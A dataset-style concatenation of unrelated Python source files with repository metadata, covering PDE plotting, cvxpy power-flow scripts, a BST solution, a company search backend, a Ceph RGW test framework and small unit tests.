print("exact(0.5, 0.5) = {}".format(fempde1.exact(np.array([0.5,0.5]))))
print("approx(0.5, 0.5) = {}".format(fempde1.approx(np.array([0.5,0.5]))))
print("L2 norm to the real solution {}".format(fempde1.normL2()))
print("solving took {} sec".format(fempde1.exec_time))
print("solving uses {} Mb".format(fempde1.mem_consumption/1000000))
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.exact(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
fig.tight_layout()
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0, X1)")
plt.show()
fig.savefig("sol_pde_1.pdf", bbox_inches='tight')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.approx(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0,X1)")
plt.show()
| 31.695473 | 199 | 0.532849 | 5,508 | 0.714953 | 0 | 0 | 0 | 0 | 0 | 0 | 3,411 | 0.442757 |
6a20c03889abf01d98da2c14b133084ab0890d44 | 3,324 | py | Python | cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py | jasondark/cvxpy | 56aaa01b0e9d98ae5a91a923708129a7b37a6f18 | [
"ECL-2.0",
"Apache-2.0"
] | 38 | 2015-10-16T16:55:28.000Z | 2022-02-16T05:06:01.000Z | cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py | h-vetinari/cvxpy | 86307f271819bb78fcdf64a9c3a424773e8269fa | [
"ECL-2.0",
"Apache-2.0"
] | 28 | 2015-09-16T16:33:23.000Z | 2021-11-23T07:31:44.000Z | cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py | h-vetinari/cvxpy | 86307f271819bb78fcdf64a9c3a424773e8269fa | [
"ECL-2.0",
"Apache-2.0"
] | 21 | 2015-09-16T14:56:16.000Z | 2022-02-16T05:06:03.000Z | import numpy as np
from cvxpy import *
import copy
import time
# data for power flow problem
import numpy as np
n = 12 # total number of nodes
m = 18 # number of edges (transmission lines)
k = 4 # number of generators
# transmission line capacities =
TIME = 0
Pmax = np.matrix("""
4.8005,
1.9246,
3.4274,
2.9439,
4.5652,
4.0484,
2.8259,
1.0740,
4.2856,
2.7788,
3.4617,
4.1677,
4.6873,
3.9528,
1.7051,
2.6228,
4.7419,
4.6676,
""")
Gmax = np.matrix("3; 2; 4; 7") # maximum generator power
c = np.matrix("4; 8; 5; 3") # supply generator costs
d = np.matrix("""
1.6154
2.3405
1.0868
1.5293
2.2197
1.0148
1.2083
1.3041
""")# network power demands
# graph incidence matrix
A = np.matrix(""" -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 -1 -1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 -1 -1 0 0 0 0 0 0 -1 ;
0 0 0 0 0 0 -1 0 0 0 0 0 0 0 -1 0 -1 0 ;
1 0 0 0 1 -1 0 0 0 0 0 0 0 0 0 0 0 0 ;
0 1 1 0 -1 0 1 -1 0 0 0 0 0 0 0 0 0 0 ;
0 0 0 1 0 0 0 0 -1 1 0 0 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 1 1 0 0 0 -1 0 1 0 0 1 ;
0 0 0 0 0 0 0 0 0 0 1 -1 0 0 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 1 1 -1 0 0 0 0 ;
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 ;
0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 -1 1 0
""")
g = Variable(k)
p = Variable(m)
obj = Minimize(c.T*g)
constraints = [A*p == vstack(-g, d.T), abs(p) <= Pmax.T, 0 <= g, g <= Gmax]
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# N - 1 contingency
g = Variable(k)
flows = []
obj = Minimize(c.T*g)
for i in range(m):
flows.append(Variable(m))
constraints = [g <= Gmax, 0 <= g]
for i in range(m): # N -1 redundancy
constraints.append(A*flows[i] == vstack(-g, d.T))
constraints.append( flows[i][i] == 0 )
constraints.append( abs(flows[i]) <= Pmax.T )
prob = Problem(obj, constraints)
tic = time.time()
val = prob.solve()
toc = time.time()
TIME += toc - tic
ANSWERS.append(val)
pass #print val
pass #print g.value
# the code below is not data for the problem
# it is used only to generate the network graph
# x-y coordinates
# each row is node x-y coordinates
XY = np.matrix("""
1.5 5.2;
4.9 5;
6.9 3.5;
1.9 3.5;
0.2 4.4;
3.2 4.8;
5.9 4.5;
3.9 3.6;
5.9 2.5;
3.9 3;
1.4 2.5;
0 3
""");
# node adjacency matrix
Ad = -A*A.T
Ad = Ad - np.diag(np.diag(Ad))
epsx = 0.05; epsy = 0.15; # text placing offset
# plotting
import matplotlib.pyplot as plt
for i in range(12): #plot edges
for j in range(i):
if Ad[i,j] == 1:
pass #plt.plot((XY[i,0], XY[j,0]), (XY[i,1], XY[j,1]), 'k-')
for j in range(k): #plot nodes
pass #plt.plot(XY[j,0],XY[j,1],'rs', markersize=12)
pass #plt.text(XY[j,0]-epsx,XY[j,1]+epsy,str(j+1))
for j in range(k,n):
pass #plt.plot(XY[j,0],XY[j,1],'ko')
pass #plt.axis('off')
pass #plt.savefig('pwr_net.eps')
if __name__ == '__main__':
pass #plt.show() | 23.083333 | 75 | 0.513538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,061 | 0.620036 |
6a213e8a5b6a8886b1f3aeab6a75af090df46ca9 | 996 | py | Python | LeetCode/530 Minimum Absolute Difference in BST.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/530 Minimum Absolute Difference in BST.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/530 Minimum Absolute Difference in BST.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | # Binary Search Tree
# Given a binary search tree with non-negative values, find the minimum absolute difference between values of any two nodes.
#
# Example:
#
# Input:
#
# 1
# \
# 3
# /
# 2
#
# Output:
# 1
#
# Explanation:
# The minimum absolute difference is 1, which is the difference between 2 and 1 (or between 2 and 3).
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def getMinimumDifference(self, root):
"""
:type root: TreeNode
:rtype: int
"""
self.minDiff = []
def travel(node):
if not node:
return
self.minDiff.append(node.val)
L = travel(node.left)
R = travel(node.right)
travel(root)
self.minDiff = sorted(self.minDiff)
return min(abs(a - b) for a, b in zip(self.minDiff, self.minDiff[1:]))
| 23.162791 | 124 | 0.566265 | 485 | 0.486948 | 0 | 0 | 0 | 0 | 0 | 0 | 548 | 0.550201 |
6a240de4a4b62bd30eb577321f80af837069962e | 2,029 | py | Python | backends/search/__init__.py | dev-easyshares/company | 61842839121f308619c59a8f52ab76c8b9dcdd30 | [
"MIT"
] | null | null | null | backends/search/__init__.py | dev-easyshares/company | 61842839121f308619c59a8f52ab76c8b9dcdd30 | [
"MIT"
] | null | null | null | backends/search/__init__.py | dev-easyshares/company | 61842839121f308619c59a8f52ab76c8b9dcdd30 | [
"MIT"
] | null | null | null | from company.choices import fr as choices
from mighty.errors import BackendError
import datetime, logging
logger = logging.getLogger(__name__)
CHOICES_APE = dict(choices.APE)
CHOICES_LEGALFORM = dict(choices.LEGALFORM)
CHOICES_SLICE = dict(choices.SLICE_EFFECTIVE)
class SearchBackend:
message = None
since_format = None
iso_format = '%Y-%m-%dT%H:%M:%S.%f%z'
def in_error(self, message):
self.message = message
def backend_error(self, msg):
raise BackendError(msg)
def companies(self, companies, response_code):
if str(response_code)[0] == '4': self.in_error(companies[0]['message'])
elif str(response_code)[0] == '5': self.in_error('error server')
return companies
def get_ape_str(self, code):
try:
return CHOICES_APE[code]
except Exception:
pass
return code
def get_legalform_str(self, code):
try:
code = int(code)
return CHOICES_LEGALFORM[code]
except Exception:
pass
return code
def get_slice_str(self, code):
try:
return CHOICES_SLICE[code]
except Exception:
pass
return code
def lastupdate(self, date):
return datetime.datetime.strptime(date, self.iso_format).strftime("%Y-%m-%d")
def since(self, date):
logger.warning(date)
return datetime.datetime.strptime(date, self.since_format).strftime("%Y-%m-%d")
def get_companies(self, companies, response_code):
raise NotImplementedError("Subclasses should implement get_companies()")
def get_company_by_siren(self, siren):
raise NotImplementedError("Subclasses should implement get_company_by_siren()")
def get_company_by_fulltext(self, fulltext):
raise NotImplementedError("Subclasses should implement get_company_by_fulltext()")
def get_active_companies(self, fulltext):
raise NotImplementedError("Subclasses should implement get_active_companies()") | 31.215385 | 90 | 0.670281 | 1,762 | 0.868408 | 0 | 0 | 0 | 0 | 0 | 0 | 277 | 0.13652 |
6a24c49a2e92d735c1970a4ba7a5a35023549f08 | 504 | py | Python | app/database/database.py | luisornelasch/melp | 82ff5c84d0df866ee64da10b96f61400c0809845 | [
"MIT"
] | null | null | null | app/database/database.py | luisornelasch/melp | 82ff5c84d0df866ee64da10b96f61400c0809845 | [
"MIT"
] | null | null | null | app/database/database.py | luisornelasch/melp | 82ff5c84d0df866ee64da10b96f61400c0809845 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine, engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os
SQLALCHEMY_DATABASE_URL = os.getenv("DATABASE_URL").replace("postgres://", "postgresql+psycopg2://")
engine = create_engine(SQLALCHEMY_DATABASE_URL)
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base()
def get_db():
db = SessionLocal()
try:
yield db
finally:
db.close()
| 24 | 100 | 0.753968 | 0 | 0 | 95 | 0.188492 | 0 | 0 | 0 | 0 | 51 | 0.10119 |
6a25b6baad0282a34406b60b6191667dfe9a128b | 13,698 | py | Python | ragweed/framework.py | soumyakoduri/ragweed | 7d4a729ff761fe1ca073b7ceade46acf1321e9fd | [
"MIT"
] | null | null | null | ragweed/framework.py | soumyakoduri/ragweed | 7d4a729ff761fe1ca073b7ceade46acf1321e9fd | [
"MIT"
] | null | null | null | ragweed/framework.py | soumyakoduri/ragweed | 7d4a729ff761fe1ca073b7ceade46acf1321e9fd | [
"MIT"
] | null | null | null | import sys
import os
import boto
import boto.s3.connection
import json
import inspect
import pickle
import bunch
import yaml
import ConfigParser
import rados
from boto.s3.key import Key
from nose.plugins.attrib import attr
from nose.tools import eq_ as eq
from .reqs import _make_admin_request
ragweed_env = None
suite = None
class RGWConnection:
def __init__(self, access_key, secret_key, host, port, is_secure):
self.host = host
self.port = port
self.is_secure = is_secure
self.conn = boto.connect_s3(
aws_access_key_id = access_key,
aws_secret_access_key = secret_key,
host=host,
port=port,
is_secure=is_secure,
calling_format = boto.s3.connection.OrdinaryCallingFormat(),
)
def create_bucket(self, name):
return self.conn.create_bucket(name)
def get_bucket(self, name, validate=True):
return self.conn.get_bucket(name, validate=validate)
class RGWRESTAdmin:
def __init__(self, connection):
self.conn = connection
def get_resource(self, path, params):
r = _make_admin_request(self.conn, "GET", path, params)
if r.status != 200:
raise boto.exception.S3ResponseError(r.status, r.reason)
return bunch.bunchify(json.loads(r.read()))
def read_meta_key(self, key):
return self.get_resource('/admin/metadata', {'key': key})
def get_bucket_entrypoint(self, bucket_name):
return self.read_meta_key('bucket:' + bucket_name)
def get_bucket_instance_info(self, bucket_name, bucket_id = None):
if not bucket_id:
ep = self.get_bucket_entrypoint(bucket_name)
print ep
bucket_id = ep.data.bucket.bucket_id
result = self.read_meta_key('bucket.instance:' + bucket_name + ":" + bucket_id)
return result.data.bucket_info
def check_bucket_index(self, bucket_name):
return self.get_resource('/admin/bucket',{'index' : None, 'bucket':bucket_name})
def get_obj_layout(self, key):
path = '/' + key.bucket.name + '/' + key.name
params = {'layout': None}
if key.version_id is not None:
params['versionId'] = key.version_id
print params
return self.get_resource(path, params)
def get_zone_params(self):
return self.get_resource('/admin/config', {'type': 'zone'})
class RSuite:
def __init__(self, name, bucket_prefix, zone, suite_step):
self.name = name
self.bucket_prefix = bucket_prefix
self.zone = zone
self.config_bucket = None
self.rtests = []
self.do_preparing = False
self.do_check = False
for step in suite_step.split(','):
if step == 'prepare':
self.do_preparing = True
self.config_bucket = self.zone.create_raw_bucket(self.get_bucket_name('conf'))
if step == 'check' or step == 'test':
self.do_check = True
self.config_bucket = self.zone.get_raw_bucket(self.get_bucket_name('conf'))
def get_bucket_name(self, suffix):
return self.bucket_prefix + '-' + suffix
def register_test(self, t):
self.rtests.append(t)
def write_test_data(self, test):
k = Key(self.config_bucket)
k.key = 'tests/' + test._name
k.set_contents_from_string(test.to_json())
def read_test_data(self, test):
k = Key(self.config_bucket)
k.key = 'tests/' + test._name
s = k.get_contents_as_string()
print 'read_test_data=', s
test.from_json(s)
def is_preparing(self):
return self.do_preparing
def is_checking(self):
return self.do_check
class RTestJSONSerialize(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (list, dict, str, unicode, int, float, bool, type(None))):
return JSONEncoder.default(self, obj)
return {'__pickle': pickle.dumps(obj)}
def rtest_decode_json(d):
if '__pickle' in d:
return pickle.loads(str(d['__pickle']))
return d
class RPlacementRule:
def __init__(self, rule):
r = rule.split('/', 1)
self.placement_id = r[0]
if (len(r) == 2):
self.storage_class=r[1]
else:
self.storage_class = 'STANDARD'
class RBucket:
def __init__(self, zone, bucket, bucket_info):
self.zone = zone
self.bucket = bucket
self.name = bucket.name
self.bucket_info = bucket_info
try:
self.placement_rule = RPlacementRule(self.bucket_info.placement_rule)
self.placement_target = self.zone.get_placement_target(self.bucket_info.placement_rule)
except:
pass
def get_data_pool(self):
try:
# old style explicit pool
explicit_pool = self.bucket_info.bucket.pool
except:
# new style explicit pool
explicit_pool = self.bucket_info.bucket.explicit_placement.data_pool
if explicit_pool is not None and explicit_pool != '':
return explicit_pool
return self.placement_target.get_data_pool(self.placement_rule)
def get_tail_pool(self, obj_layout):
try:
placement_rule = obj_layout.manifest.tail_placement.placement_rule
except:
placement_rule = ''
if placement_rule == '':
try:
# new style
return obj_layout.manifest.tail_placement.bucket.explicit_placement.data_pool
except:
pass
try:
# old style
return obj_layout.manifest.tail_bucket.pool
except:
pass
pr = RPlacementRule(placement_rule)
return self.placement_target.get_data_pool(pr)
class RStorageClasses:
def __init__(self, config):
if hasattr(config, 'storage_classes'):
self.storage_classes = config.storage_classes
else:
try:
self.storage_classes = bunch.bunchify({ 'STANDARD': { 'data_pool': config.data_pool }})
except:
self.storage_classes = None
pass
def get(self, storage_class):
assert(self.storage_classes != None)
try:
if not storage_class:
storage_class = 'STANDARD'
sc = self.storage_classes[storage_class]
except:
eq('could not find storage class ' + storage_class, 0)
return sc
def get_all(self):
for (name, _) in self.storage_classes.iteritems():
yield name
class RPlacementTarget:
def __init__(self, name, config):
self.name = name
self.index_pool = config.index_pool
self.data_extra_pool = config.data_extra_pool
self.storage_classes = RStorageClasses(config)
if not self.data_extra_pool:
self.data_extra_pool = self.storage_classes.get_data_pool('STANDARD')
def get_data_pool(self, placement_rule):
return self.storage_classes.get(placement_rule.storage_class).data_pool
class RZone:
def __init__(self, conn):
self.conn = conn
self.rgw_rest_admin = RGWRESTAdmin(self.conn.system)
self.zone_params = self.rgw_rest_admin.get_zone_params()
self.placement_targets = {}
for e in self.zone_params.placement_pools:
self.placement_targets[e.key] = e.val
print 'zone_params:', self.zone_params
def get_placement_target(self, placement_id):
plid = placement_id
if placement_id is None or placement_id == '':
print 'zone_params=', self.zone_params
plid = self.zone_params.default_placement
try:
return RPlacementTarget(plid, self.placement_targets[plid])
except:
pass
return None
def get_default_placement(self):
return get_placement_target(self.zone_params.default_placement)
def create_bucket(self, name):
bucket = self.create_raw_bucket(name)
bucket_info = self.rgw_rest_admin.get_bucket_instance_info(bucket.name)
print 'bucket_info:', bucket_info
return RBucket(self, bucket, bucket_info)
def get_bucket(self, name):
bucket = self.get_raw_bucket(name)
bucket_info = self.rgw_rest_admin.get_bucket_instance_info(bucket.name)
print 'bucket_info:', bucket_info
return RBucket(self, bucket, bucket_info)
def create_raw_bucket(self, name):
return self.conn.regular.create_bucket(name)
def get_raw_bucket(self, name):
return self.conn.regular.get_bucket(name)
def refresh_rbucket(self, rbucket):
rbucket.bucket = self.get_raw_bucket(rbucket.bucket.name)
rbucket.bucket_info = self.rgw_rest_admin.get_bucket_instance_info(rbucket.bucket.name)
class RTest:
def __init__(self):
self._name = self.__class__.__name__
self.r_buckets = []
self.init()
def create_bucket(self):
bid = len(self.r_buckets) + 1
bucket_name = suite.get_bucket_name(self._name + '.' + str(bid))
bucket_name = bucket_name.replace("_", "-")
rb = suite.zone.create_bucket(bucket_name)
self.r_buckets.append(rb)
return rb
def get_buckets(self):
for rb in self.r_buckets:
yield rb
def init(self):
pass
def prepare(self):
pass
def check(self):
pass
def to_json(self):
attrs = {}
for x in dir(self):
if x.startswith('r_'):
attrs[x] = getattr(self, x)
return json.dumps(attrs, cls=RTestJSONSerialize)
def from_json(self, s):
j = json.loads(s, object_hook=rtest_decode_json)
for e in j:
setattr(self, e, j[e])
def save(self):
suite.write_test_data(self)
def load(self):
suite.read_test_data(self)
for rb in self.r_buckets:
suite.zone.refresh_rbucket(rb)
def test(self):
suite.register_test(self)
if suite.is_preparing():
self.prepare()
self.save()
if suite.is_checking():
self.load()
self.check()
def read_config(fp):
config = bunch.Bunch()
g = yaml.safe_load_all(fp)
for new in g:
print bunch.bunchify(new)
config.update(bunch.bunchify(new))
return config
str_config_opts = [
'user_id',
'access_key',
'secret_key',
'host',
'ceph_conf',
'bucket_prefix',
]
int_config_opts = [
'port',
]
bool_config_opts = [
'is_secure',
]
def dict_find(d, k):
if d.has_key(k):
return d[k]
return None
class RagweedEnv:
def __init__(self):
self.config = bunch.Bunch()
cfg = ConfigParser.RawConfigParser()
try:
path = os.environ['RAGWEED_CONF']
except KeyError:
raise RuntimeError(
'To run tests, point environment '
+ 'variable RAGWEED_CONF to a config file.',
)
with file(path) as f:
cfg.readfp(f)
for section in cfg.sections():
try:
(section_type, name) = section.split(None, 1)
if not self.config.has_key(section_type):
self.config[section_type] = bunch.Bunch()
self.config[section_type][name] = bunch.Bunch()
cur = self.config[section_type]
except ValueError:
section_type = ''
name = section
self.config[name] = bunch.Bunch()
cur = self.config
cur[name] = bunch.Bunch()
for var in str_config_opts:
try:
cur[name][var] = cfg.get(section, var)
except ConfigParser.NoOptionError:
pass
for var in int_config_opts:
try:
cur[name][var] = cfg.getint(section, var)
except ConfigParser.NoOptionError:
pass
for var in bool_config_opts:
try:
cur[name][var] = cfg.getboolean(section, var)
except ConfigParser.NoOptionError:
pass
print json.dumps(self.config)
rgw_conf = self.config.rgw
try:
self.bucket_prefix = rgw_conf.bucket_prefix
except:
self.bucket_prefix = 'ragweed'
conn = bunch.Bunch()
for (k, u) in self.config.user.iteritems():
conn[k] = RGWConnection(u.access_key, u.secret_key, rgw_conf.host, dict_find(rgw_conf, 'port'), dict_find(rgw_conf, 'is_secure'))
self.zone = RZone(conn)
self.suite = RSuite('ragweed', self.bucket_prefix, self.zone, os.environ['RAGWEED_STAGES'])
try:
self.ceph_conf = self.config.rados.ceph_conf
except:
raise RuntimeError(
'ceph_conf is missing under the [rados] section in ' + os.environ['RAGWEED_CONF']
)
self.rados = rados.Rados(conffile=self.ceph_conf)
self.rados.connect()
pools = self.rados.list_pools()
for pool in pools:
print "rados pool>", pool
def setup_module():
global ragweed_env
global suite
ragweed_env = RagweedEnv()
suite = ragweed_env.suite
| 29.649351 | 141 | 0.593663 | 12,492 | 0.911958 | 177 | 0.012922 | 0 | 0 | 0 | 0 | 796 | 0.058111 |
6a27987a8cba79e77e7ec06fe0349b417f6ae225 | 44 | py | Python | exposing/_version.py | w4k2/exposing | 6abbced18aa567ed45426ba915f3b56e7aeca028 | [
"BSD-3-Clause"
] | null | null | null | exposing/_version.py | w4k2/exposing | 6abbced18aa567ed45426ba915f3b56e7aeca028 | [
"BSD-3-Clause"
] | 1 | 2018-05-28T10:35:02.000Z | 2018-05-28T10:35:02.000Z | exposing/_version.py | w4k2/exposing | 6abbced18aa567ed45426ba915f3b56e7aeca028 | [
"BSD-3-Clause"
] | null | null | null | """
``exposing``
"""
__version__ = '0.2.2'
| 7.333333 | 21 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 27 | 0.613636 |
6a27b2bcfa7e4d8b0487cdb6693479a656fd6bb3 | 136 | py | Python | opensteer/teams/admin.py | reckonsys/opensteer | 3c47bcf0a8de8e363ce8cced02827fe21a0d406a | [
"MIT"
] | 5 | 2019-10-14T05:48:43.000Z | 2021-08-29T17:42:48.000Z | opensteer/teams/admin.py | reckonsys/opensteer | 3c47bcf0a8de8e363ce8cced02827fe21a0d406a | [
"MIT"
] | 26 | 2019-09-19T08:51:45.000Z | 2022-03-12T00:05:29.000Z | opensteer/teams/admin.py | reckonsys/opensteer | 3c47bcf0a8de8e363ce8cced02827fe21a0d406a | [
"MIT"
] | 1 | 2020-01-08T21:50:05.000Z | 2020-01-08T21:50:05.000Z | from django.contrib import admin
from opensteer.teams.models import Team, Member
admin.site.register(Team)
admin.site.register(Member)
| 22.666667 | 47 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
6a2905a1e278bec5cf1d153f6d2fadf970789157 | 2,657 | py | Python | tests/test_utils.py | ozora-ogino/tflite-human-tracking | d1be51c628e1464b5e2953a611df6e974a9ffbaa | [
"MIT"
] | 3 | 2021-12-20T00:43:28.000Z | 2022-03-12T00:54:42.000Z | tests/test_utils.py | ozora-ogino/tflite-human-tracking | d1be51c628e1464b5e2953a611df6e974a9ffbaa | [
"MIT"
] | null | null | null | tests/test_utils.py | ozora-ogino/tflite-human-tracking | d1be51c628e1464b5e2953a611df6e974a9ffbaa | [
"MIT"
] | 5 | 2021-12-03T08:59:18.000Z | 2022-03-17T11:25:38.000Z | from src.utils import check_direction, direction_config, is_intersect
# pylint:disable=unexpected-keyword-arg
class TestCheckDirection:
def test_true(self):
"""Test true case."""
directions = {
"right": {"prev_center": [0, 0], "current_center": [20, 0], "expect": True},
"left": {"prev_center": [10, 0], "current_center": [0, 0], "expect": True},
"top": {"prev_center": [0, 10], "current_center": [0, 0], "expect": True},
"bottom": {"prev_center": [0, 0], "current_center": [0, 10], "expect": True},
}
for direction_str, args in directions.items():
expect = args.pop("expect")
result = check_direction(**args, direction=direction_config[direction_str])
assert result == expect
def test_false(self):
"""Test false case."""
directions = {
"right": {"prev_center": [0, 0], "current_center": [0, 0], "expect": False},
# This is right.
"left": {"prev_center": [0, 0], "current_center": [10, 0], "expect": False},
# This is bottom.
"top": {"prev_center": [0, 0], "current_center": [0, 10], "expect": False},
# This is top.
"bottom": {"prev_center": [0, 10], "current_center": [0, 0], "expect": False},
}
for direction_str, args in directions.items():
expect = args.pop("expect")
result = check_direction(**args, direction=direction_config[direction_str])
assert result == expect
def test_direction_none(self):
"""Check if always return true when direction is set None."""
args = [
{"prev_center": [0, 0], "current_center": [0, 0]}, # No movement.
{"prev_center": [0, 0], "current_center": [10, 0]}, # Right
{"prev_center": [10, 0], "current_center": [0, 0]}, # Left.
{"prev_center": [0, 10], "current_center": [0, 0]}, # Top.
{"prev_center": [0, 0], "current_center": [0, 10]}, # Bottom.
]
for arg in args:
# If the direction is None, always return True.
result = check_direction(**arg, direction=None)
assert result == True
class TestIsIntersect:
def test_true(self):
"""Test true case."""
args = {"A": [10, 0], "B": [10, 30], "C": [0, 10], "D": [30, 0]}
result = is_intersect(**args)
assert result == True
def test_false(self):
"""Test false case."""
args = {"A": [10, 0], "B": [10, 30], "C": [0, 10], "D": [0, 0]}
result = is_intersect(**args)
assert result == False
| 42.174603 | 90 | 0.530297 | 2,540 | 0.955965 | 0 | 0 | 0 | 0 | 0 | 0 | 856 | 0.322168 |
6a296c2965af2f5264f62e16fe377851c022b76e | 44 | py | Python | scpp_base/scpp_base/src/db/__init__.py | scorelab/social-currency | f539893104bdfe098cfa58c8d9fabcbb00874c52 | [
"Apache-2.0"
] | 4 | 2018-10-02T06:31:18.000Z | 2019-11-16T15:21:34.000Z | scpp_base/scpp_base/src/db/__init__.py | horizon00/social-currency | f539893104bdfe098cfa58c8d9fabcbb00874c52 | [
"Apache-2.0"
] | 2 | 2017-12-06T11:54:14.000Z | 2019-11-11T11:34:06.000Z | scpp_base/scpp_base/src/db/__init__.py | horizon00/social-currency | f539893104bdfe098cfa58c8d9fabcbb00874c52 | [
"Apache-2.0"
] | 5 | 2017-02-27T10:10:41.000Z | 2019-11-11T11:45:37.000Z | _all__ = ["db_handler","coin_value_handler"] | 44 | 44 | 0.772727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.727273 |
6a29d2f85143afe8ae63f5fd3499c691c4db69b3 | 2,792 | py | Python | test/test_parameter_set.py | crest-cassia/caravan_search_engine | 5c3bd3176b44e8c3145ba67b4240678e18a1394e | [
"MIT"
] | null | null | null | test/test_parameter_set.py | crest-cassia/caravan_search_engine | 5c3bd3176b44e8c3145ba67b4240678e18a1394e | [
"MIT"
] | null | null | null | test/test_parameter_set.py | crest-cassia/caravan_search_engine | 5c3bd3176b44e8c3145ba67b4240678e18a1394e | [
"MIT"
] | null | null | null | import unittest
from caravan.tables import Tables
from caravan.parameter_set import ParameterSet
class ParameterSetTest(unittest.TestCase):
def setUp(self):
self.t = Tables.get()
self.t.clear()
def test_ps(self):
ps = ParameterSet(500, (2, 3, 4, 5))
self.assertEqual(ps.id, 500)
self.assertEqual(ps.params, (2, 3, 4, 5))
self.assertEqual(ps.run_ids, [])
def test_find_or_create(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ps.id, 0)
self.assertEqual(ps.params, (0, 1, 2, 3))
self.assertEqual(len(ParameterSet.all()), 1)
ps2 = ParameterSet.find_or_create(3, 4, 5, 6)
self.assertEqual(len(ParameterSet.all()), 2)
def test_find_or_create(self):
ps1 = ParameterSet.find_or_create(0, 1, 2, 3)
ps2 = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ps1, ps2)
self.assertEqual(len(ParameterSet.all()), 1)
def test_create_runs(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
runs = ps.create_runs_upto(3)
self.assertEqual([r.id for r in runs], [0, 1, 2])
self.assertEqual([r.seed for r in runs], [0, 1, 2])
ps2 = ParameterSet.find_or_create(0, 1, 3, 4)
runs = ps2.create_runs_upto(3)
self.assertEqual([r.id for r in runs], [3, 4, 5])
self.assertEqual([r.seed for r in runs], [0, 1, 2])
def test_is_finished(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ps.is_finished(), True)
runs = ps.create_runs_upto(1)
self.assertFalse(ps.is_finished())
self.assertEqual(len(ps.finished_runs()), 0)
runs[0].store_result([1.0, 2.0, 3.0], 0, 3, 111, 222)
self.assertTrue(ps.is_finished())
self.assertEqual(len(ps.finished_runs()), 1)
def test_average_results(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
runs = ps.create_runs_upto(3)
self.assertEqual(ps.average_results(), ())
for (i, r) in enumerate(runs):
r.store_result([1.0 + i, 2.0 + i, 3.0 + 1], 0, 3, 111, 222)
self.assertEqual(ps.average_results(), (2.0, 3.0, 4.0))
def test_all(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
self.assertEqual(ParameterSet.all(), [ps])
ps2 = ParameterSet.find_or_create(0, 1, 2, 4)
self.assertEqual(ParameterSet.all(), [ps, ps2])
self.assertEqual(len(ParameterSet.all()), 2)
def test_find(self):
ps = ParameterSet.find_or_create(0, 1, 2, 3)
ps2 = ParameterSet.find_or_create(0, 1, 2, 4)
pid = ps2.id
self.assertEqual(pid, 1)
self.assertEqual(ParameterSet.find(1), ps2)
if __name__ == '__main__':
unittest.main()
| 36.736842 | 71 | 0.609599 | 2,643 | 0.946633 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.003582 |
6a29e328b66b3aa40c02b6c801e1beb3b20cffb7 | 1,470 | py | Python | tests/unit/transport/s3/test_settings.py | TinkoffCreditSystems/overhave | b0ab705ef5c5c5a65fa0b14b173b64fd7310e187 | [
"Apache-2.0"
] | 33 | 2021-02-01T15:49:37.000Z | 2021-12-20T00:44:43.000Z | tests/unit/transport/s3/test_settings.py | TinkoffCreditSystems/overhave | b0ab705ef5c5c5a65fa0b14b173b64fd7310e187 | [
"Apache-2.0"
] | 46 | 2021-02-03T12:56:52.000Z | 2021-12-19T18:50:27.000Z | tests/unit/transport/s3/test_settings.py | TinkoffCreditSystems/overhave | b0ab705ef5c5c5a65fa0b14b173b64fd7310e187 | [
"Apache-2.0"
] | 1 | 2021-12-07T09:02:44.000Z | 2021-12-07T09:02:44.000Z | import pytest
from pydantic import ValidationError
from overhave.transport import OverhaveS3ManagerSettings
class TestS3ManagerSettings:
""" Unit tests for :class:`OverhaveS3ManagerSettings`. """
@pytest.mark.parametrize("test_s3_enabled", [False])
